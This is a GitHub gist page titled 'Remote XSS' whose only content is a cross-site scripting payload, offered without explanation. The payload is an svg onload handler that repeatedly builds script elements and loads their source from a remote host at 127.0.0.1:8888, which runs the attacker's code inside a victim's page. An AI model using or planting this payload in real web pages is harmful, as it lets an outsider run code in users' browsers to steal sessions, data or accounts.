Skip to content

Instantly share code, notes, and snippets.

@elagrija
elagrija / XSS-payload.html
Created August 23, 2018 15:23 — forked from bl4de/XSS-payload.html
Remote XSS
<svg/onload=(function(){d=document;s=d.createElement('script');d.body.appendChild(s);
setInterval(function(){d.body.removeChild(s);s=d.createElement('script');d.body.appendChild(s);
s.src="//127.0.0.1:8888";d.body.appendChild(s);},0);})()>